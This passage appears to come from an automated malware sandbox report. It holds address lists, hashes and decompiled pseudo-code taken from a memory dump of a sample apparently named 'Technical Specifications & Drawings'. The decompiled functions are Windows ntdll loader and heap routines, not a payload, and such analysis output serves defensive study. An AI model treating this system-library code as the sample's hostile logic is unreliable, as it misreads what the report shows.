                                                  0x01811859
                                                  0x0181185c
                                                  0x00000000
                                                  0x00000000
                                                  0x01811851
                                                  0x01811853
                                                  0x01811855
                                                  0x01811865
                                                  0x01811865
                                                  0x01811866
                                                  0x01811868
                                                  0x01811870
                                                  0x00000000
                                                  0x01811870
                                                  0x01811857
                                                  0x01811857
                                                  0x0181185e
                                                  0x00000000
                                                  0x018116d2
                                                  0x018116d2
                                                  0x018116d5
                                                  0x018116d5
                                                  0x018116d8
                                                  0x018116da
                                                  0x018116dd
                                                  0x018116e0
                                                  0x018116e3
                                                  0x018116e5
                                                  0x01811808
                                                  0x01811808
                                                  0x01811809
                                                  0x01811812
                                                  0x01811817
                                                  0x01811817
                                                  0x00000000
                                                  0x01811817
                                                  0x018116eb
                                                  0x018116ed
                                                  0x00000000
                                                  0x00000000
                                                  0x018116f6
                                                  0x018116f9
                                                  0x018116ff
                                                  0x01811701
                                                  0x0181172c
                                                  0x0181172c
                                                  0x0181172f
                                                  0x01811732
                                                  0x01811734
                                                  0x01811737
                                                  0x0181173b
                                                  0x0181175e
                                                  0x0181175e
                                                  0x01811761
                                                  0x01811764
                                                  0x0181176d
                                                  0x01811774
                                                  0x01811777
                                                  0x0181177a
                                                  0x0181177c
                                                  0x0181177f
                                                  0x01811781
                                                  0x01811781
                                                  0x01811784
                                                  0x01811784
                                                  0x0181177f
                                                  0x0181178c
                                                  0x01811791
                                                  0x01811796
                                                  0x01811799
                                                  0x0181179c
                                                  0x0181179e
                                                  0x018117a5
                                                  0x018117a9
                                                  0x018117c9
                                                  0x018117ce
                                                  0x018117ab
                                                  0x018117c1
                                                  0x018117c6
                                                  0x018117dc
                                                  0x018117e3
                                                  0x018117e8
                                                  0x018117ee
                                                  0x018117f1
                                                  0x018117f5
                                                  0x018117f7
                                                  0x018117fe
                                                  0x018117ff
                                                  0x018117ff
                                                  0x018117f5
                                                  0x0181179c
                                                  0x00000000
                                                  0x01811764
                                                  0x01811741
                                                  0x01811746
                                                  0x01811748
                                                  0x00000000
                                                  0x00000000
                                                  0x01811754
                                                  0x00000000
                                                  0x01811754
                                                  0x01811703
                                                  0x01811710
                                                  0x01811710
                                                  0x01811713
                                                  0x00000000
                                                  0x00000000
                                                  0x01811708
                                                  0x0181170a
                                                  0x0181170c
                                                  0x0181171c
                                                  0x0181171c
                                                  0x0181171d
                                                  0x0181171f
                                                  0x01811727
                                                  0x00000000
                                                  0x01811727
                                                  0x0181170e
                                                  0x0181170e
                                                  0x01811715
                                                  0x00000000
                                                  0x01811715
                                                  0x018116cc
                                                  0x017c9a45
                                                  0x017c9a45
                                                  0x017c9a0e
                                                  0x017c9a1c
                                                  0x017c9a23
                                                  0x0181167e
                                                  0x0181167f
                                                  0x01811681
                                                  0x01811683
                                                  0x01811684
                                                  0x00000000
                                                  0x01811684
                                                  0x00000000
                                                  0x017c9aad
                                                  0x017c9aad
                                                  0x017c9ab0
                                                  0x017c9ab3
                                                  0x017c9ab3
                                                  0x017c9ab6
                                                  0x00000000
                                                  0x00000000
                                                  0x017c9ab8
                                                  0x017c9aba
                                                  0x017c9abc
                                                  0x017c9ac8
                                                  0x017c9ac8
                                                  0x00000000
                                                  0x017c9abe
                                                  0x017c9abe
                                                  0x017c9ac0
                                                  0x00000000
                                                  0x017c9ac0
                                                  0x017c9abc
                                                  0x017c9ad2
                                                  0x00000000
                                                  0x017c9ad2
                                                  0x017c9aab

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: c3393fc6e18316fa3a8867a44bca0fb73a5f50cd6231c0f7800ecb57ec8e8110
                                                  • Instruction ID: b5eb0983ab44efeaac6e35a9fc8558600bbfa280b299f55960f74cda0951db8f
                                                  • Opcode Fuzzy Hash: c3393fc6e18316fa3a8867a44bca0fb73a5f50cd6231c0f7800ecb57ec8e8110
                                                  • Instruction Fuzzy Hash: 5F22D1716002469FEB25DF2CC498B7AFBA9EF44704F28855DEA46CB349E731DA81CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017B8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 83%
                                                  			E017B8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E017B934A() != 0) {
								_t159 = E0182A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1895780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01825510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1895780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E017B849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E017B8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E017B8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1895c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1895c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E017C2280(_t92, 0x18986cc);
															_t94 = E01879DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E017D61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1895c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E017B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1895c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1895c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E017EF380(_t136, 0x1781184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E017C2280(_t108, 0x18986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E017D61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01879D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E017BFFB0(_t118, _t156, 0x18986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E017E9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                  0x017b8799
                                                  0x017b879d
                                                  0x017b87a1
                                                  0x017b87a3
                                                  0x017b87a8
                                                  0x017b87c3
                                                  0x017b87c3
                                                  0x017b87c8
                                                  0x017b87d1
                                                  0x017b87d4
                                                  0x017b87d8
                                                  0x017b87e5
                                                  0x017b87ec
                                                  0x01809bfe
                                                  0x01809c00
                                                  0x01809c02
                                                  0x01809c08
                                                  0x01809c0d
                                                  0x01809c0f
                                                  0x01809c14
                                                  0x01809c2d
                                                  0x01809c32
                                                  0x01809c37
                                                  0x01809c3a
                                                  0x01809c3c
                                                  0x01809c42
                                                  0x01809c42
                                                  0x01809c3c
                                                  0x01809c02
                                                  0x017b87da
                                                  0x017b87df
                                                  0x017b87e3
                                                  0x00000000
                                                  0x00000000
                                                  0x017b87e3
                                                  0x017b87f2
                                                  0x00000000
                                                  0x017b87fb
                                                  0x017b87fd
                                                  0x017b87fe
                                                  0x017b880e
                                                  0x017b880f
                                                  0x017b8810
                                                  0x017b8814
                                                  0x017b881a
                                                  0x017b881c
                                                  0x017b881f
                                                  0x017b8821
                                                  0x017b8822
                                                  0x017b8824
                                                  0x017b8826
                                                  0x017b882c
                                                  0x017b882e
                                                  0x01809c48
                                                  0x01809c48
                                                  0x017b8834
                                                  0x017b8834
                                                  0x017b8837
                                                  0x00000000
                                                  0x00000000
                                                  0x017b8837
                                                  0x017b882e
                                                  0x017b883d
                                                  0x017b8840
                                                  0x017b8843
                                                  0x017b8846
                                                  0x017b8849
                                                  0x017b884c
                                                  0x017b884e
                                                  0x017b8850
                                                  0x017b8852
                                                  0x017b8854
                                                  0x017b8857
                                                  0x017b88b4
                                                  0x017b88b6
                                                  0x017b88b6
                                                  0x017b8859
                                                  0x017b8859
                                                  0x017b8859
                                                  0x017b8861
                                                  0x017b8866
                                                  0x017b886a
                                                  0x017b893d
                                                  0x017b8941
                                                  0x00000000
                                                  0x017b8947
                                                  0x017b8947
                                                  0x017b894a
                                                  0x017b894c
                                                  0x00000000
                                                  0x017b8952
                                                  0x017b8955
                                                  0x017b895a
                                                  0x017b895d
                                                  0x017b895d
                                                  0x017b895f
                                                  0x017b8961
                                                  0x017b8961
                                                  0x017b8968
                                                  0x00000000
                                                  0x00000000
                                                  0x017b896a
                                                  0x017b896b
                                                  0x017b896e
                                                  0x00000000
                                                  0x017b8970
                                                  0x017b8970
                                                  0x017b8970
                                                  0x017b8970
                                                  0x017b8972
                                                  0x017b8972
                                                  0x017b8974
                                                  0x00000000
                                                  0x017b897a
                                                  0x017b897a
                                                  0x017b897d
                                                  0x00000000
                                                  0x017b8983
                                                  0x01809c65
                                                  0x01809c6d
                                                  0x01809c72
                                                  0x01809c75
                                                  0x01809c75
                                                  0x01809c82
                                                  0x01809c86
                                                  0x01809c87
                                                  0x01809c88
                                                  0x01809c89
                                                  0x01809c8c
                                                  0x01809c90
                                                  0x01809c95
                                                  0x01809c97
                                                  0x01809ca0
                                                  0x01809ca3
                                                  0x01809ca9
                                                  0x01809ca9
                                                  0x00000000
                                                  0x01809ca9
                                                  0x01809ca3
                                                  0x00000000
                                                  0x01809c97
                                                  0x017b897d
                                                  0x00000000
                                                  0x017b8974
                                                  0x017b8988
                                                  0x017b8992
                                                  0x017b8996
                                                  0x00000000
                                                  0x017b8996
                                                  0x017b894c
                                                  0x00000000
                                                  0x017b8870
                                                  0x017b887b
                                                  0x017b887d
                                                  0x017b887f
                                                  0x017b8881
                                                  0x017b8884
                                                  0x017b8884
                                                  0x017b8886
                                                  0x017b8889
                                                  0x017b888c
                                                  0x017b888e
                                                  0x017b8891
                                                  0x017b8891
                                                  0x017b8898
                                                  0x00000000
                                                  0x00000000
                                                  0x017b889a
                                                  0x017b889b
                                                  0x017b889e
                                                  0x00000000
                                                  0x00000000
                                                  0x017b88a0
                                                  0x017b88a8
                                                  0x017b88b0
                                                  0x017b88b2
                                                  0x017b88d3
                                                  0x017b88d5
                                                  0x00000000
                                                  0x017b88d7
                                                  0x017b88db
                                                  0x017b88dc
                                                  0x017b88e0
                                                  0x017b88e8
                                                  0x017b88ee
                                                  0x017b88f0
                                                  0x017b88f3
                                                  0x017b88fc
                                                  0x017b8901
                                                  0x017b8906
                                                  0x017b890c
                                                  0x017b890c
                                                  0x017b890f
                                                  0x017b8916
                                                  0x017b8917
                                                  0x017b8918
                                                  0x017b8919
                                                  0x017b891a
                                                  0x017b891f
                                                  0x017b8921
                                                  0x01809c52
                                                  0x01809c55
                                                  0x01809c5b
                                                  0x01809cac
                                                  0x01809cc0
                                                  0x01809cc0
                                                  0x01809c55
                                                  0x017b8927
                                                  0x017b8927
                                                  0x017b892f
                                                  0x017b8933
                                                  0x00000000
                                                  0x017b88f5
                                                  0x017b88f5
                                                  0x00000000
                                                  0x017b88f7
                                                  0x017b88f7
                                                  0x017b88fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017b88fa
                                                  0x017b88f5
                                                  0x017b88f3
                                                  0x00000000
                                                  0x017b88d5
                                                  0x00000000
                                                  0x017b88b2
                                                  0x017b88c9
                                                  0x00000000
                                                  0x017b88c9
                                                  0x017b887f
                                                  0x017b886a
                                                  0x017b8857
                                                  0x017b8852
                                                  0x017b88bf
                                                  0x017b88bf
                                                  0x017b87aa
                                                  0x017b87ad
                                                  0x017b87ae
                                                  0x017b87b4
                                                  0x017b87b5
                                                  0x017b87b6
                                                  0x017b87b8
                                                  0x017b87bd
                                                  0x017b87c1
                                                  0x017b87f4
                                                  0x017b87fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017b87c1
                                                  0x00000000

                                                  Strings
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01809C28
                                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01809C18
                                                  • LdrpDoPostSnapWork, xrefs: 01809C1E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 2994545307-1948996284
                                                  • Opcode ID: fe15fed0abe96d0654943ff480ee95cbe9123c506fb323a39fc4e5acb961cd4a
                                                  • Instruction ID: 970064ee97e3d540748acea143643db175bdbcda45880d071822ab351c6f27b9
                                                  • Opcode Fuzzy Hash: fe15fed0abe96d0654943ff480ee95cbe9123c506fb323a39fc4e5acb961cd4a
                                                  • Instruction Fuzzy Hash: E991E271A1021ADBDF19DF59D8C0AEAF7B9FF44318B054169EA05AB245DB30EA01CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DAC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E017DAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E017FD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x1898a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E017E96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01853C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E017E96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E017AB150();
							} else {
								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E017AB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E018614FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E017C7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01861411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E017C7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01861411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                  0x017dac85
                                                  0x017dac88
                                                  0x017dac8a
                                                  0x017dac8d
                                                  0x017dac91
                                                  0x017dac99
                                                  0x017dac9c
                                                  0x01819f57
                                                  0x01819f5b
                                                  0x01819f60
                                                  0x01819f60
                                                  0x017daca8
                                                  0x017dacae
                                                  0x017dacda
                                                  0x017dacde
                                                  0x017dace8
                                                  0x017daceb
                                                  0x017dacee
                                                  0x00000000
                                                  0x017dacee
                                                  0x017dacf6
                                                  0x017dacb0
                                                  0x017dacb0
                                                  0x017dacbb
                                                  0x017dacbd
                                                  0x017dacc0
                                                  0x017dacc5
                                                  0x017dadae
                                                  0x017dadb4
                                                  0x017dadb4
                                                  0x017dacd4
                                                  0x017dacd8
                                                  0x017dacf9
                                                  0x017dacff
                                                  0x017dad04
                                                  0x017dad08
                                                  0x017dad09
                                                  0x017dad10
                                                  0x017dad12
                                                  0x017dad18
                                                  0x01819f6f
                                                  0x01819f74
                                                  0x01819f76
                                                  0x01819f7c
                                                  0x01819f84
                                                  0x01819f88
                                                  0x01819f89
                                                  0x01819f90
                                                  0x01819f90
                                                  0x01819f76
                                                  0x017dad1e
                                                  0x017dad24
                                                  0x017dad26
                                                  0x0181a097
                                                  0x0181a09b
                                                  0x0181a0ba
                                                  0x0181a0bf
                                                  0x0181a09d
                                                  0x0181a0b2
                                                  0x0181a0b7
                                                  0x0181a0c5
                                                  0x0181a0c8
                                                  0x0181a0cb
                                                  0x0181a0d2
                                                  0x00000000
                                                  0x017dad2c
                                                  0x017dad2c
                                                  0x017dad2f
                                                  0x017dad34
                                                  0x017dad36
                                                  0x01819f97
                                                  0x01819f9a
                                                  0x00000000
                                                  0x00000000
                                                  0x01819fa9
                                                  0x017dad3e
                                                  0x017dad3e
                                                  0x017dad41
                                                  0x01819fb3
                                                  0x01819fb9
                                                  0x01819fc0
                                                  0x01819fd0
                                                  0x01819fd0
                                                  0x01819fc0
                                                  0x017dad4a
                                                  0x017dad50
                                                  0x017dad5c
                                                  0x017dad62
                                                  0x017dad68
                                                  0x017dad6b
                                                  0x017dad6d
                                                  0x01819fda
                                                  0x01819fdd
                                                  0x00000000
                                                  0x00000000
                                                  0x01819fec
                                                  0x00000000
                                                  0x017dad73
                                                  0x017dad73
                                                  0x017dad73
                                                  0x017dad75
                                                  0x017dad75
                                                  0x017dad78
                                                  0x01819ff6
                                                  0x01819ffc
                                                  0x0181a003
                                                  0x0181a00e
                                                  0x0181a010
                                                  0x0181a01b
                                                  0x0181a01b
                                                  0x0181a01b
                                                  0x0181a038
                                                  0x0181a038
                                                  0x0181a003
                                                  0x017dad84
                                                  0x017dad89
                                                  0x017dad8c
                                                  0x017dad8e
                                                  0x0181a042
                                                  0x0181a045
                                                  0x00000000
                                                  0x00000000
                                                  0x0181a054
                                                  0x00000000
                                                  0x017dad94
                                                  0x017dad94
                                                  0x017dad94
                                                  0x017dad96
                                                  0x017dad96
                                                  0x017dad99
                                                  0x0181a063
                                                  0x0181a065
                                                  0x0181a070
                                                  0x0181a070
                                                  0x0181a070
                                                  0x0181a08d
                                                  0x0181a08d
                                                  0x017dada4
                                                  0x017dada6
                                                  0x00000000
                                                  0x017dada6
                                                  0x017dad8e
                                                  0x017dad6d
                                                  0x017dad3c
                                                  0x017dad3c
                                                  0x00000000
                                                  0x017dad3c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017dacd8

                                                  Strings
                                                  • HEAP: , xrefs: 0181A0BA
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0181A0CD
                                                  • HEAP[%wZ]: , xrefs: 0181A0AD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: fdadf2b47c6cd4e6b0f3fa5c06ab3d79740afc6086b4ab312e2d5da87f80c75a
                                                  • Instruction ID: 4437fbcbc640fd2e2e4b5b1981a7f5fed137e1399cbc89a043951712088469a2
                                                  • Opcode Fuzzy Hash: fdadf2b47c6cd4e6b0f3fa5c06ab3d79740afc6086b4ab312e2d5da87f80c75a
